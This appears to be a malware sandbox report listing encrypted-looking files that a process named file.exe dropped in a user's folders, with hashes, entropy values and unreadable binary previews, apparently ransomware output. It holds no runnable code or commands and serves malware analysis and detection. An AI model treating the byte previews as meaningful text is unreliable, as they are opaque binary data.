Size (bytes):	1360
Entropy (8bit):	7.854560762954737
Encrypted:	false
SSDEEP:	24:OMMDJgwwlKHQU/nrN3GmSVPVBK0RoqlqWfYQBvkTe6Af/VGbD:OMu7wtU/rN3GmutBKgoqlqYYQBvSe6si
MD5:	5FD07BA4217059115CB0D9ED6B667211
SHA1:	E28B13AFBF34403EEF34D9AFD063EA98C8E5ED39
SHA-256:	E6726FBDADDA9501E4DAC59C531831D60F7468CD4318B65EF7FBD1134C5602D5
SHA-512:	3A9B3B1A516A2DA0137EB1DDEE04C9519E087EAA751EC1CDAC490E530E345E7AD3E62C75AA0CC54C38DB9B1923AAF31A0BADE81CEDCB32E8360840F77BC21DF1
Malicious:	false
Preview:	UMMBDvC).U..7>m../`..F..'.].$.>...g.$.r.$...\...d.Vo..Y.D.h;e}^...DH..g.\..m?...N..[ 9.&2I.j.h.v...........}..=Q:.........Q.-....\|Q...=......]..;.Ic......<..he..+..f..v...........3.&.X_.B.cv@.K.~..9lS.&.X...j.g.t.jd....7r.p.,.i....ES2.7.9bl.;..g.A.....Y>.....+n...-...6.G-}.H.xM.:G...m........N..KHo...S..N.d.C.l.n..6-.oKRA;.K..........b.).ss^/A...m.....q#.,]].s...s0q..v@.^vv.l..?k\|[W.....)..{..Z....~iC..F......L..(0.1w.V.N4......F..ty.}....Zg...yJA..4.^.,v..;Y5B.......)L.&6..w...\|....~:..:.@..m..U...$5./v.$Ps.`..D.j.5&.Z....R...`m.....Z.I<..o.\|2..;o.R.ke..V..>.fL...ZZ;.?.........+yC&m.-....1.B.p..\.._?...9........F7..I.V.LA,z.>..u.YDH.`laG.....'..R.WwG..jv.t....R.p.M.z$a..F.K...[q......+}......p....n.2 ...V....[.P.\|._.\|...6.!.$...2.[.7..\...t......l..k....<q.L....0....R>.9..>6.P....d923V...S.<...DN~..r."8..3.....0V..K{....!.)......E.W.....o...=r..+....A..K.8N`...mF.!X.bc......V.......*..NZ...(.?.E..:>.M.v.)pi:

C:\Users\user\Desktop\UMMBDNEQBN\BPMLNOBVSB.png

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.865769901214144
Encrypted:	false
SSDEEP:	24:oKGqwqGtgx/+j0KkCt+EcXcryFKdBEy+EpdJCo+NXSIAbKHSXGRutOXG7TNsbD:oZ3qGq7Ct+EcXcK8aDSdJtwhA6kcwTED
MD5:	EF96048379238CDCA886C6D58FB4A274
SHA1:	7BDD9A5BF12A6E81E9F04950FB7872116DF58E12
SHA-256:	84B3031A90C36DA7895D2BE0D9CE165BB920B4FE5B8C01388C0CBA09144F0FD9
SHA-512:	5A323198AAEEECEC3B0FCE2DED57C9EE7CECAF1A09A05DC1C16AA79943BA316A11C83130258476DC05BA6195013C97071B41FB459BE8A3575D117574B6819920
Malicious:	false
Preview:	BPMLN!....O@]...F;U....~...F.V.W.......>..0~!.2....e......./.I.&!....a.n(..H..:^.y.....'..M.&..qd/Y..{A..1.....H/..Dc..,..r.c......n`..e\.....FP..D.....V.....?x....\|......\.)@X0.._...:p$....q../..j7....f...HO=..r9.C.....s.....F....w.[.....b..A....SHG..M.W....c...:........7./...c.+..Tn3.6...S....+KL.^."v..Y..X...\..Xbj....fk.gW,...."U.`p...t.?.mrQX......E. .....nh.n.y3..\.<..)..BoP....1...y...d\]..K....A..c...3....zbvm4b_.I...Vg..$.o..hD2}.O1.%.....0/.Y.?g.%5.%.e..g.../.2...L.kC.B1...q..m.I.x9.(........`(d..............g&....la..=.}v..........Q8Ca.8.S..;..".....B..&.c....'.....F...S...../.Qu...W9a=..F.`$...M..\E..X..u.R.....o.:G.D.6..1.8........H.HvL.A1..a.......h2....n.$;....S2.Dt`;.y...51......J.O[..I.p...@..eX...G....<.j lHCa.5.$......6.t...:.<@...L.5.s}......'....<.I.Y.}H.Fb./..O/.,+^......fE@.F..E.G.d.h.r.w...f.Rv.py?]Sb.Oq.(.~.k.(........U.@.-.K @,.xj~..(....`.r.....:5AZ.........$./jE../~<).x.$.....OU.9.Y./.

C:\Users\user\Desktop\UMMBDNEQBN\BPMLNOBVSB.png.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.865769901214144
Encrypted:	false
SSDEEP:	24:oKGqwqGtgx/+j0KkCt+EcXcryFKdBEy+EpdJCo+NXSIAbKHSXGRutOXG7TNsbD:oZ3qGq7Ct+EcXcK8aDSdJtwhA6kcwTED
MD5:	EF96048379238CDCA886C6D58FB4A274
SHA1:	7BDD9A5BF12A6E81E9F04950FB7872116DF58E12
SHA-256:	84B3031A90C36DA7895D2BE0D9CE165BB920B4FE5B8C01388C0CBA09144F0FD9
SHA-512:	5A323198AAEEECEC3B0FCE2DED57C9EE7CECAF1A09A05DC1C16AA79943BA316A11C83130258476DC05BA6195013C97071B41FB459BE8A3575D117574B6819920
Malicious:	false
Preview:	BPMLN!....O@]...F;U....~...F.V.W.......>..0~!.2....e......./.I.&!....a.n(..H..:^.y.....'..M.&..qd/Y..{A..1.....H/..Dc..,..r.c......n`..e\.....FP..D.....V.....?x....\|......\.)@X0.._...:p$....q../..j7....f...HO=..r9.C.....s.....F....w.[.....b..A....SHG..M.W....c...:........7./...c.+..Tn3.6...S....+KL.^."v..Y..X...\..Xbj....fk.gW,...."U.`p...t.?.mrQX......E. .....nh.n.y3..\.<..)..BoP....1...y...d\]..K....A..c...3....zbvm4b_.I...Vg..$.o..hD2}.O1.%.....0/.Y.?g.%5.%.e..g.../.2...L.kC.B1...q..m.I.x9.(........`(d..............g&....la..=.}v..........Q8Ca.8.S..;..".....B..&.c....'.....F...S...../.Qu...W9a=..F.`$...M..\E..X..u.R.....o.:G.D.6..1.8........H.HvL.A1..a.......h2....n.$;....S2.Dt`;.y...51......J.O[..I.p...@..eX...G....<.j lHCa.5.$......6.t...:.<@...L.5.s}......'....<.I.Y.}H.Fb./..O/.,+^......fE@.F..E.G.d.h.r.w...f.Rv.py?]Sb.Oq.(.~.k.(........U.@.-.K @,.xj~..(....`.r.....:5AZ.........$./jE../~<).x.$.....OU.9.Y./.

C:\Users\user\Desktop\UMMBDNEQBN\CURQNKVOIX.mp3

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.848927654248861
Encrypted:	false
SSDEEP:	24:lOanAo9qiI4pF3tDOF7qDlJGPXoZPTpqbDcU+G9sHGxT0skREXiiZobD:lOPo9z/tiF7U4PaccNNQiIyD
MD5:	33FDD1CD58ED695E2CAD614FB6365B60
SHA1:	1E7B82F08BA2BE4EEA45ED3A7CD13D15A2FD94C3
SHA-256:	BBD103F8350D1AC62E454B2E3EB979D786EC1A88F2795C5762E968952D490160
SHA-512:	A1B1B49DB9AD37922488F611EF27F7CD66361C365BC9E289ED8C9204037C82360F3D42BDDA84604E9EFA1D88D9042D6010CD09EE72DB8B1A5936E34ACA7A48EF
Malicious:	false
Preview:	CURQN.a.....n....".h...BeX...Q...V.%.BgO.5...2E.>`:M............z.{\...EC..6.......E.i...1..l.,B.. ......_...Q..........%....M....{.t{.....}A..#.....Xf8up.lPL..0..(.zjlf...B.Q..C-JD4..=....$..-.x.4'....Z...w.d..>...6...`...... @..Vk#G.Q..p.....}..NA..I.aO./...%f..]n..Tu..Z.Rx.{.#)....=.5....-O..j(..Dn#.0.b...481.W.P.B...M..>F#.~..gBC~B..._{e..1....}a.bL.....h.{H..2......`....A....6am.(LG.......3......)>....k.Md....S....e^G..K....X..."8R.9..c.bt.}F...`.......yTF..xR.....#.q.Jm.;:o.;..M.FYE..bf...m.+A......Aq.+Mk......i.V....&CY...t......r{Q.....!.[..`.....L.p...t.....0...rx...S]..o.....o..$.#3.ef..B...9......H...\.b...HT} ~.......,.J.C&.-....U..R.v.(D...<..e..<..[..AT.C..a.q.q.v....Yw.cG..4Z.. h[zA<..L.h..q7x'-. j...E.......na.pj.....>....n#..e..\|.(8z5..R;y.~.3.!.u..+jZ}l.]G.)T.WK....PG....c.}......r.)..(..m.....g.G..9.../`..y9.C6....8.#...%=...9.k5s.H.[...@3..P....[.;.."..E.~s\p.+.,...;e).....f.e.......V.b.).r...*..f..A.k.......X

C:\Users\user\Desktop\UMMBDNEQBN\CURQNKVOIX.mp3.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.848927654248861
Encrypted:	false
SSDEEP:	24:lOanAo9qiI4pF3tDOF7qDlJGPXoZPTpqbDcU+G9sHGxT0skREXiiZobD:lOPo9z/tiF7U4PaccNNQiIyD
MD5:	33FDD1CD58ED695E2CAD614FB6365B60
SHA1:	1E7B82F08BA2BE4EEA45ED3A7CD13D15A2FD94C3
SHA-256:	BBD103F8350D1AC62E454B2E3EB979D786EC1A88F2795C5762E968952D490160
SHA-512:	A1B1B49DB9AD37922488F611EF27F7CD66361C365BC9E289ED8C9204037C82360F3D42BDDA84604E9EFA1D88D9042D6010CD09EE72DB8B1A5936E34ACA7A48EF
Malicious:	false
Preview:	CURQN.a.....n....".h...BeX...Q...V.%.BgO.5...2E.>`:M............z.{\...EC..6.......E.i...1..l.,B.. ......_...Q..........%....M....{.t{.....}A..#.....Xf8up.lPL..0..(.zjlf...B.Q..C-JD4..=....$..-.x.4'....Z...w.d..>...6...`...... @..Vk#G.Q..p.....}..NA..I.aO./...%f..]n..Tu..Z.Rx.{.#)....=.5....-O..j(..Dn#.0.b...481.W.P.B...M..>F#.~..gBC~B..._{e..1....}a.bL.....h.{H..2......`....A....6am.(LG.......3......)>....k.Md....S....e^G..K....X..."8R.9..c.bt.}F...`.......yTF..xR.....#.q.Jm.;:o.;..M.FYE..bf...m.+A......Aq.+Mk......i.V....&CY...t......r{Q.....!.[..`.....L.p...t.....0...rx...S]..o.....o..$.#3.ef..B...9......H...\.b...HT} ~.......,.J.C&.-....U..R.v.(D...<..e..<..[..AT.C..a.q.q.v....Yw.cG..4Z.. h[zA<..L.h..q7x'-. j...E.......na.pj.....>....n#..e..\|.(8z5..R;y.~.3.!.u..+jZ}l.]G.)T.WK....PG....c.}......r.)..(..m.....g.G..9.../`..y9.C6....8.#...%=...9.k5s.H.[...@3..P....[.;.."..E.~s\p.+.,...;e).....f.e.......V.b.).r...*..f..A.k.......X

C:\Users\user\Desktop\UMMBDNEQBN\DVWHKMNFNN.xlsx

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.852212053944955
Encrypted:	false
SSDEEP:	24:Ut0anBXDraFJATubbWabb/CaZAL9iGPqWVJi6LWUx65R8DKTNS3aYIbD:00M1faYC3WU6a6L9iGSaEU+W243aYSD
MD5:	9E781FB091A7EEEF26348EEFAE54538E
SHA1:	5C855A724C40F9EE070EA9F2E09C24A148CE8D63
SHA-256:	B72815C0BC76F8FF1C859E9411E49A535EB7F02660590221933F2ECE2EF15C1D
SHA-512:	AAC94E779F204F0DD5F432AF384E54B79DA7C03CC184AC0710D3EB52227976590F807BFFF32CD81B590571B5053FF9A27CAA20F21112651B25D1AC3C36D1CA28
Malicious:	false
Preview:	DVWHK7.x3O...Z0S6....\w.aY.n`...s.a@.....m.o.v.....:U.U.m.!.\../&.N......(...E...V4W.Y..?...".,%..x.Q...;R...._.9..%.......82&f...<..@.E.9.:~Z5..H...~..d.....rEK..p9......g.1e...i.v.7F2]..Q.n.1....qm1R...k.......Z_f).r$!a...zc..29q.......".E.ZS..z..1.zo.6.a....0@....<......I..{]TJa...h..<.....Z.n...X......x....Yq...;..JG.X2...-<.3..0.c\|......J..f...X..[UI..B...#...r.......$\|.T...^.\|..S(k.A......P.....+i.#.9....0.W....."..U...~b..u..zb.]9....S7...na!...".{..&...A`....OG...y...).C....@]..X.xy..T.._{.y.V..d9$....X%l..+.'i.....9K6..$.i..D.;M.Uz.?+E..Fm....r..e'......o.Z...5.5..J2....Q.......V..!.ToR.t-Q..J....G...>.........]o....x#.w..C`^.$....v..T..l.p..F.h...l......0....1#.9.P..$.TcI....O.\..v.T^..=b?....qj.9oH_yk..FZA..S...../..U.P.l&......Q....d...\..6..6..N.....w..H(`WK......*.....'..e.-_(......U....-.tt..yw=........@ ...[..]y^.z..v.9..3g..B.....r....,..!^.;I?&..B......AU..j..;....t+dq''.,..GO..c..iTmK.h.7.'.).d..h..j.B.p.5Fi'..%

C:\Users\user\Desktop\UMMBDNEQBN\DVWHKMNFNN.xlsx.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.852212053944955
Encrypted:	false
SSDEEP:	24:Ut0anBXDraFJATubbWabb/CaZAL9iGPqWVJi6LWUx65R8DKTNS3aYIbD:00M1faYC3WU6a6L9iGSaEU+W243aYSD
MD5:	9E781FB091A7EEEF26348EEFAE54538E
SHA1:	5C855A724C40F9EE070EA9F2E09C24A148CE8D63
SHA-256:	B72815C0BC76F8FF1C859E9411E49A535EB7F02660590221933F2ECE2EF15C1D
SHA-512:	AAC94E779F204F0DD5F432AF384E54B79DA7C03CC184AC0710D3EB52227976590F807BFFF32CD81B590571B5053FF9A27CAA20F21112651B25D1AC3C36D1CA28
Malicious:	false
Preview:	DVWHK7.x3O...Z0S6....\w.aY.n`...s.a@.....m.o.v.....:U.U.m.!.\../&.N......(...E...V4W.Y..?...".,%..x.Q...;R...._.9..%.......82&f...<..@.E.9.:~Z5..H...~..d.....rEK..p9......g.1e...i.v.7F2]..Q.n.1....qm1R...k.......Z_f).r$!a...zc..29q.......".E.ZS..z..1.zo.6.a....0@....<......I..{]TJa...h..<.....Z.n...X......x....Yq...;..JG.X2...-<.3..0.c\|......J..f...X..[UI..B...#...r.......$\|.T...^.\|..S(k.A......P.....+i.#.9....0.W....."..U...~b..u..zb.]9....S7...na!...".{..&...A`....OG...y...).C....@]..X.xy..T.._{.y.V..d9$....X%l..+.'i.....9K6..$.i..D.;M.Uz.?+E..Fm....r..e'......o.Z...5.5..J2....Q.......V..!.ToR.t-Q..J....G...>.........]o....x#.w..C`^.$....v..T..l.p..F.h...l......0....1#.9.P..$.TcI....O.\..v.T^..=b?....qj.9oH_yk..FZA..S...../..U.P.l&......Q....d...\..6..6..N.....w..H(`WK......*.....'..e.-_(......U....-.tt..yw=........@ ...[..]y^.z..v.9..3g..B.....r....,..!^.;I?&..B......AU..j..;....t+dq''.,..GO..c..iTmK.h.7.'.).d..h..j.B.p.5Fi'..%

C:\Users\user\Desktop\UMMBDNEQBN\JSDNGYCOWY.jpg

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.862316335191318
Encrypted:	false
SSDEEP:	24:jl8vIzBFr4CgnejUePF8RWxIkZyuaEGvdMCgSkSzVcaD5KBxS+uv47reMEbD:p8vWvDEejuIn3aMU+e5OS+uyreZD
MD5:	D40C9117398DE5691924AB18A4217635
SHA1:	76A90C1BDDC7D0AAFB54BD32C73F5D2EBEAFC93A
SHA-256:	BE93E2E4211F72E565B39812471AEFDF3B65D210F9D1CD464EEBBBB96C6D2404
SHA-512:	AE36E66C9811F4B581D1DB16C6E24B33F0B8155FDBE3AF034D802DB11DE0F1FD5764933556AA0B0088FFB287711C9082E7E64BA44BA2A833E6E256957EFFB521
Malicious:	false
Preview:	JSDNG..?.q.yO.D.j .r..F.......y=.M..Fa.o.......>t..Jkt8..L<.t.........M.$...~._.l..,Y..X.I^..z.Z...<G.\|.`".t.T..k....@.&...H~6.......@...3..Ck.oP..V....XkF.../.d......S.Gl5.X....3=...B..,.....NQ.?8..1........"r...".,.]4.p.\|..Uv.s.T.............q.V..wt......xm.M.P.]...9J.j.Q..^y>.^".c.........x.....IbQ.Wr\|m....\|:.x1;-.m?...Th....j8..i.A.a.....e.<Y0.,.A.....x...../........0..w........I.._P..~.io..r....9.......,. 2.m..<...T$0.=..g....).(....#V.........".....F..T..&E9C.E...C.....v.l..A..4e..].P>.E0..l.t`q<..'pR...9..U.U3!ub3E.....w_...n.!....:.....SN.....8o.K..vv2.O.Tn....N..%-.nY......s2..^8.l:.....:........6oS....\...V..M...5.\....V..~.^8.c..........3.......j...dX.DN...x.Q.-]....L.....qDl....&.8..bVq.`+u>..=e....N.....%..&z....0N=..I.m/wG....~k<3....bB..[.xe.. ].W.Ev.P...........C.\.[?......2...v..:7.^F..Kkk..%...,...Z!...^..P.....F.U..B..`..[..........cO....\|3.b..~y..i..m.RI.._e...z.....c.([v..!.{..F2s.S..!..6H{...$..&...U..Hd..

C:\Users\user\Desktop\UMMBDNEQBN\JSDNGYCOWY.jpg.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.862316335191318
Encrypted:	false
SSDEEP:	24:jl8vIzBFr4CgnejUePF8RWxIkZyuaEGvdMCgSkSzVcaD5KBxS+uv47reMEbD:p8vWvDEejuIn3aMU+e5OS+uyreZD
MD5:	D40C9117398DE5691924AB18A4217635
SHA1:	76A90C1BDDC7D0AAFB54BD32C73F5D2EBEAFC93A
SHA-256:	BE93E2E4211F72E565B39812471AEFDF3B65D210F9D1CD464EEBBBB96C6D2404
SHA-512:	AE36E66C9811F4B581D1DB16C6E24B33F0B8155FDBE3AF034D802DB11DE0F1FD5764933556AA0B0088FFB287711C9082E7E64BA44BA2A833E6E256957EFFB521
Malicious:	false
Preview:	JSDNG..?.q.yO.D.j .r..F.......y=.M..Fa.o.......>t..Jkt8..L<.t.........M.$...~._.l..,Y..X.I^..z.Z...<G.\|.`".t.T..k....@.&...H~6.......@...3..Ck.oP..V....XkF.../.d......S.Gl5.X....3=...B..,.....NQ.?8..1........"r...".,.]4.p.\|..Uv.s.T.............q.V..wt......xm.M.P.]...9J.j.Q..^y>.^".c.........x.....IbQ.Wr\|m....\|:.x1;-.m?...Th....j8..i.A.a.....e.<Y0.,.A.....x...../........0..w........I.._P..~.io..r....9.......,. 2.m..<...T$0.=..g....).(....#V.........".....F..T..&E9C.E...C.....v.l..A..4e..].P>.E0..l.t`q<..'pR...9..U.U3!ub3E.....w_...n.!....:.....SN.....8o.K..vv2.O.Tn....N..%-.nY......s2..^8.l:.....:........6oS....\...V..M...5.\....V..~.^8.c..........3.......j...dX.DN...x.Q.-]....L.....qDl....&.8..bVq.`+u>..=e....N.....%..&z....0N=..I.m/wG....~k<3....bB..[.xe.. ].W.Ev.P...........C.\.[?......2...v..:7.^F..Kkk..%...,...Z!...^..P.....F.U..B..`..[..........cO....\|3.b..~y..i..m.RI.._e...z.....c.([v..!.{..F2s.S..!..6H{...$..&...U..Hd..

C:\Users\user\Desktop\UMMBDNEQBN\UMMBDNEQBN.docx

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.85530251709752
Encrypted:	false
SSDEEP:	24:30Rn48a10PxYYAffUU6865G2msR0VSXi3O5bp/Mn9oKwoPbMZybD:Qn/e66YAHUYuGDA093ONdMqKwoPb5D
MD5:	D4B319125F99B67D410E894B2741B2A7
SHA1:	3D4369591F15BE38505ADA139C99DB342F13E545
SHA-256:	5B83F5DB30DE137F671938F4426EE04A5FA5D50FB7C4AF6F407306A120344117
SHA-512:	AC6CB7A6760BA3527454B3F3556058B973DB32609CCCE493E70E4D03685C869BF6713B34545ABBBF7FDCE2BC1CEC895A830E4684E052DDB6B07FBD65BC7DEF36
Malicious:	false
Preview:	UMMBD..2A#e....S...!r........3s "\|.t#Y.\|.C)..U.....A7..t.c...>z.z....g.%.......D..="#A.....mO-.......JP..K ...-.zLFZ.W..2..J.t&.-..t.W.J.R...T:.j.r......Q..)v..^../g./8..rJ.r7,..3..m.....t..t.....!(..WI.i=...~.}..~.R.b....8......9....~.p..<6^..Y...u...@..v.+g...[...y.V....8.?.q............S]9..N`..kK......."...Y...~4...:..!Z........q.~.1PN.=".L#.2u<..>Q..C4[..+D...<.......-.<._y.n....+`W.p..a...f&#.P.z..p..7...^.9..?,...}.S..3a)..K.gG7..w<Z.1.Y.{.a~G..>...SY.s.u.z.[$.......@.i.~j.r.l..\2...9bg..oS'..c.../..gA....3..\......`.x.!+.........=.s.......S....H...j.4z.....H#5. %..5.C^n..Z...',<...+]AL_&....DB...K.x 1R./..9...'..p..BB3.x.....N-.H$$..R....YX.../..L.....?#....uX.w....i......C...Ql.K....x./....W10?..(!.9\|..sS...Xm....nY.J,U.I..W.G.{..........wqx........X>.Z.....a........PY3.+......X...'u..F..Y....2yC..R..noI.b-y...~{.X<\...?.z...l.gC..-n;...Vu.I%..}. RaM...j..E...87).9B....x.un.....c..C..u.z..tr...s\|.......e.j).n........9.

C:\Users\user\Desktop\UMMBDNEQBN\UMMBDNEQBN.docx.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.85530251709752
Encrypted:	false
SSDEEP:	24:30Rn48a10PxYYAffUU6865G2msR0VSXi3O5bp/Mn9oKwoPbMZybD:Qn/e66YAHUYuGDA093ONdMqKwoPb5D
MD5:	D4B319125F99B67D410E894B2741B2A7
SHA1:	3D4369591F15BE38505ADA139C99DB342F13E545
SHA-256:	5B83F5DB30DE137F671938F4426EE04A5FA5D50FB7C4AF6F407306A120344117
SHA-512:	AC6CB7A6760BA3527454B3F3556058B973DB32609CCCE493E70E4D03685C869BF6713B34545ABBBF7FDCE2BC1CEC895A830E4684E052DDB6B07FBD65BC7DEF36
Malicious:	false
Preview:	UMMBD..2A#e....S...!r........3s "\|.t#Y.\|.C)..U.....A7..t.c...>z.z....g.%.......D..="#A.....mO-.......JP..K ...-.zLFZ.W..2..J.t&.-..t.W.J.R...T:.j.r......Q..)v..^../g./8..rJ.r7,..3..m.....t..t.....!(..WI.i=...~.}..~.R.b....8......9....~.p..<6^..Y...u...@..v.+g...[...y.V....8.?.q............S]9..N`..kK......."...Y...~4...:..!Z........q.~.1PN.=".L#.2u<..>Q..C4[..+D...<.......-.<._y.n....+`W.p..a...f&#.P.z..p..7...^.9..?,...}.S..3a)..K.gG7..w<Z.1.Y.{.a~G..>...SY.s.u.z.[$.......@.i.~j.r.l..\2...9bg..oS'..c.../..gA....3..\......`.x.!+.........=.s.......S....H...j.4z.....H#5. %..5.C^n..Z...',<...+]AL_&....DB...K.x 1R./..9...'..p..BB3.x.....N-.H$$..R....YX.../..L.....?#....uX.w....i......C...Ql.K....x./....W10?..(!.9\|..sS...Xm....nY.J,U.I..W.G.{..........wqx........X>.Z.....a........PY3.+......X...'u..F..Y....2yC..R..noI.b-y...~{.X<\...?.z...l.gC..-n;...Vu.I%..}. RaM...j..E...87).9B....x.un.....c..C..u.z..tr...s\|.......e.j).n........9.

C:\Users\user\Desktop\UMMBDNEQBN\WUTJSCBCFX.pdf

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.865565648722666
Encrypted:	false
SSDEEP:	24:9oJSL4f4tzjHecPdDGCuWe0aLmb+r0LlhpXd/KFZXrYbDzUb1UdcObD:t8fUje6VteFLmb+olTXVuXHb+D
MD5:	86E88D8970EEA94BD63B5C8DD4E86244
SHA1:	3032BAF9E8B5E683F8F55640D10410C93892C323
SHA-256:	1067E25A30D71EBCE1A94B4F471F316D0F941DF5B7027741D52D56FFF41FC2E4
SHA-512:	99C87940617838244F6F4DD0624BDA7175F7C16158F97F5DBA8F61D151675AB09D75756E96A8BE5C9B35613F3AE865BE9E6A95924687EDAA24288231ECD2BC9F
Malicious:	false
Preview:	WUTJS...q.6..g.V."~8.x....Xv.aU8U.&.l\\|.%.^....0..Z.........O.......#y.m..~.cR.!.............q.....f......../..W ....q../.OY]..m.Y...e_m.H~...Q.+z....G.....B...R.R...m../...#....h.4...n.....v..4C&.2d...Z.f.h._.$....$..h........XE.C.U.yV#...t'.....S..j............C..Wo.i.X...r...Z'a. n.g...Y..}.v..l.mL..B...f.k..(A.J...0.1a.e.$&...W..'./.S...7 E...M.j....J}.Q./].Xp(........6-R......K...@J{a..K...=q.2Sr....E.h.I.j"...?.rU>PD.?...puLo..%.P............a....s{.V...iI.0.....p...;v3...#h..u..H.'.s Z..J.]l.:<...i.&w...@}..\|y~.. .2.,".....TY...G..y..c.y...-.......,.n....,6X..})>....4...J...J..2&........_..N..GE8..%......l.tPk[..\...x....S..1..$k!."......a...eTz..n./.r...@..o..Hv...'..;.'...u.g.]>....U_..... ..A".7j.(.....G..yf..O.RK].5.%..d.+......U.h.).....9.q.IV..pf).=..J.w.IEt.."..e.e9<....d......2......o.y...S...w..F..S.5x(...h....5@ ..3Eq.#:~KD,..,l;.U../"GB.!j%X.YXC.^.................S.8...........j...5......X1ER.4........R5...c.d.8<6.....

C:\Users\user\Desktop\UMMBDNEQBN\WUTJSCBCFX.pdf.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.865565648722666
Encrypted:	false
SSDEEP:	24:9oJSL4f4tzjHecPdDGCuWe0aLmb+r0LlhpXd/KFZXrYbDzUb1UdcObD:t8fUje6VteFLmb+olTXVuXHb+D
MD5:	86E88D8970EEA94BD63B5C8DD4E86244
SHA1:	3032BAF9E8B5E683F8F55640D10410C93892C323
SHA-256:	1067E25A30D71EBCE1A94B4F471F316D0F941DF5B7027741D52D56FFF41FC2E4
SHA-512:	99C87940617838244F6F4DD0624BDA7175F7C16158F97F5DBA8F61D151675AB09D75756E96A8BE5C9B35613F3AE865BE9E6A95924687EDAA24288231ECD2BC9F
Malicious:	false
Preview:	WUTJS...q.6..g.V."~8.x....Xv.aU8U.&.l\\|.%.^....0..Z.........O.......#y.m..~.cR.!.............q.....f......../..W ....q../.OY]..m.Y...e_m.H~...Q.+z....G.....B...R.R...m../...#....h.4...n.....v..4C&.2d...Z.f.h._.$....$..h........XE.C.U.yV#...t'.....S..j............C..Wo.i.X...r...Z'a. n.g...Y..}.v..l.mL..B...f.k..(A.J...0.1a.e.$&...W..'./.S...7 E...M.j....J}.Q./].Xp(........6-R......K...@J{a..K...=q.2Sr....E.h.I.j"...?.rU>PD.?...puLo..%.P............a....s{.V...iI.0.....p...;v3...#h..u..H.'.s Z..J.]l.:<...i.&w...@}..\|y~.. .2.,".....TY...G..y..c.y...-.......,.n....,6X..})>....4...J...J..2&........_..N..GE8..%......l.tPk[..\...x....S..1..$k!."......a...eTz..n./.r...@..o..Hv...'..;.'...u.g.]>....U_..... ..A".7j.(.....G..yf..O.RK].5.%..d.+......U.h.).....9.q.IV..pf).=..J.w.IEt.."..e.e9<....d......2......o.y...S...w..F..S.5x(...h....5@ ..3Eq.#:~KD,..,l;.U../"GB.!j%X.YXC.^.................S.8...........j...5......X1ER.4........R5...c.d.8<6.....

C:\Users\user\Desktop\VLZDGUKUTZ.docx

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.83437771746549
Encrypted:	false
SSDEEP:	24:Vw7JTrcqBqUlB39K0GLhKVblNuI6CH8k1/Im7ZhA1zWLdRoufcOadcZWYjDbD:eFrvvwXcaCck1901CxZ7vXD
MD5:	483A23AC1413E38EBD77AC76794BF77C
SHA1:	7F33E324CE9CC4054467B235B85D4C3E079C6856
SHA-256:	A4F469C545DFC266CB14CCC48DA7192FE5C06474FBDA52E9006ADE4677C1BFAE
SHA-512:	A0994E223BF0FF79CA85AC29AA3D11D0CE70E53DAA74596D94D474802D80D2CCD2AFE9E30BCC9E05844DB05C0C9B7C209FEEC5492FAAD374082EF49D59937D27
Malicious:	true
Preview:	VLZDG....X.o..V...n.^.jdG[Qr.$.O.(t...t.._1.......s.0.8rH_`...8)...P>l ..x..-.J...,Ny.....[..?1CI.S.F....@.{W..................k.?"+.....pF.M.t.b.....S.4 UE.$.....b\.0...7....9Zi..>...c.&..}..Jl(M.E.3....a.e...^?`D?S.6..^.S.>..xc>L...P@.....V3..a. d6..q8nY9.3...vg...;jG.P.".)....gTl..1...wXM?J.6A>...}...PA..\....c9......2...$......9.".....{....I....$..u..)...G..W.(\K...53.?......y...r.,.\|.>Q...u.i>..t....dhA.QC............sz]c.....8..R$...C..a...v!.e.&....A...B..X...mE\]..."....)=Ra....7.@...\|k.LuZ...4.....)Q....$.e.i............R...!...nijyI........N)wy....cle.I..l.M.m..Ch.k.g"#.....<G..v .x.{t.....9...r....'.. (R...B:.....c%dk..E.......A.G....X.l.g..`r....l..X..NU.(.4.R.D](.[...$....^l[.5i\_.....s..k"1....s.`.{......CH@.M\|.e.1k.uP....'..\|..+.N .l.0..(..."je...t.....A.....C)j..+.M.F{....M.4.....T.c..~K.[...... 